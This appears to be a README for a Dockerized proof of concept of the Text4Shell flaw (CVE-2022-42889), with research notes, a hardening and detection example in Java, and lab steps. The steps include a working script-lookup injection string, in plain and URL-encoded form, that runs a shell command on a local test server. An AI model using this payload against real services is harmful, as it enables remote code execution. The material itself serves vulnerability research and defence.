
Dockerized POC for CVE-2022-42889 Text4Shell (with LunaSec research notes)


lunasec-io/cve-2022-42889-text4shell-docker


LunaSec Notes

LunaSec research notes from our investigation of Text4Shell, written as part of our blog post about the vulnerability.

We've determined that it's very unlikely that Text4Shell is exploitable in 99.999% of the usages of Apache Commons Text because very few people seem to be using the createInterpolator() method.

Our research focused on other ways that Apache Commons Text could invoke the script handler, but we were unable to find any other way to do so (even when setting flags like setEnableSubstitutionInVariables to true or using recursive variable resolution).

You can see our notes in the HelloController.java file. The file in the Test folder is how we were testing this quickly. (We're using IntelliJ, so you can just run the test from there if you have that set up.)
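To make the finding above concrete, here is an added example (not code from this repository or from LunaSec) contrasting the risky pattern, where `StringSubstitutor.createInterpolator()` wires in every default lookup including `script`, `dns` and `url`, with an interpolator built from an explicit allow-list, plus a small log/WAF-style check for the three prefixes the advisory names. It assumes Apache Commons Text on the classpath; the lookup names `sys` and `date` and the sample inputs are constructed for the demo.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.HashMap;
import java.util.Map;
import java.util.regex.Pattern;

import org.apache.commons.text.StringSubstitutor;
import org.apache.commons.text.lookup.StringLookup;
import org.apache.commons.text.lookup.StringLookupFactory;

public class Text4ShellHardening {

    /** The risky pattern: before Commons Text 1.10.0 this enables script/dns/url lookups on untrusted input. */
    static String vulnerableResolve(String userInput) {
        return StringSubstitutor.createInterpolator().replace(userInput);
    }

    /** Hardened variant: explicit allow-list, no default lookups (third arg false), no fallback lookup (null). */
    static String hardenedResolve(String userInput) {
        Map<String, StringLookup> allowed = new HashMap<>();
        allowed.put("sys", StringLookupFactory.INSTANCE.systemPropertyStringLookup());
        allowed.put("date", StringLookupFactory.INSTANCE.dateStringLookup());
        StringLookup interpolator =
                StringLookupFactory.INSTANCE.interpolatorStringLookup(allowed, null, false);
        // Unknown prefixes such as "script" resolve to null, so the text is left as-is.
        return new StringSubstitutor(interpolator).replace(userInput);
    }

    /** Detection helper for request logs or WAF rules; decodes first so the URL-encoded form is caught too. */
    private static final Pattern RISKY_PREFIX =
            Pattern.compile("\\$\\{\\s*(script|dns|url)\\s*:", Pattern.CASE_INSENSITIVE);

    static boolean looksLikeText4ShellProbe(String rawQueryValue) {
        String decoded = URLDecoder.decode(rawQueryValue, StandardCharsets.UTF_8);
        return RISKY_PREFIX.matcher(decoded).find();
    }

    public static void main(String[] args) {
        String benign = "running on Java ${sys:java.version}";   // constructed sample input
        String probe = "%24%7Bscript%3Ajavascript%3A1%2B1%7D";   // constructed, URL-encoded ${script:javascript:1+1}

        System.out.println(hardenedResolve(benign));              // version number is interpolated
        System.out.println(hardenedResolve("${script:javascript:1+1}")); // echoed unchanged: no script lookup registered
        System.out.println(looksLikeText4ShellProbe(probe));      // true
        System.out.println(looksLikeText4ShellProbe(benign));     // false
    }
}
```

Upgrading to Commons Text 1.10.0 or later removes `script`, `dns` and `url` from the default lookup set, but the allow-list form above is still the safer construction whenever the template text is user-controlled.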

Original Readme

Install maven - maven-linux

  1. Maven install to create the fat jar
     mvn clean install
  2. Docker build
     docker build --tag=text4shell .
  3. Docker run
     docker run -p 80:8080 text4shell
  4. Test the app
     http://localhost/text4shell/attack?search=<anything>
  5. The attack is performed by passing a string "${prefix:name}", where the prefix is the aforementioned lookup:
     ${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}

     http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D
  6. You can also try using the dns or url prefixes.
  7. Get the container id
     docker container ls
  8. Get into the app
     docker exec -it <container_id> bash
  9. To check whether the RCE above was successful (you should see a file named foo in the /tmp directory):
     ls /tmp/
  10. To stop the container
     docker container stop <container_id>
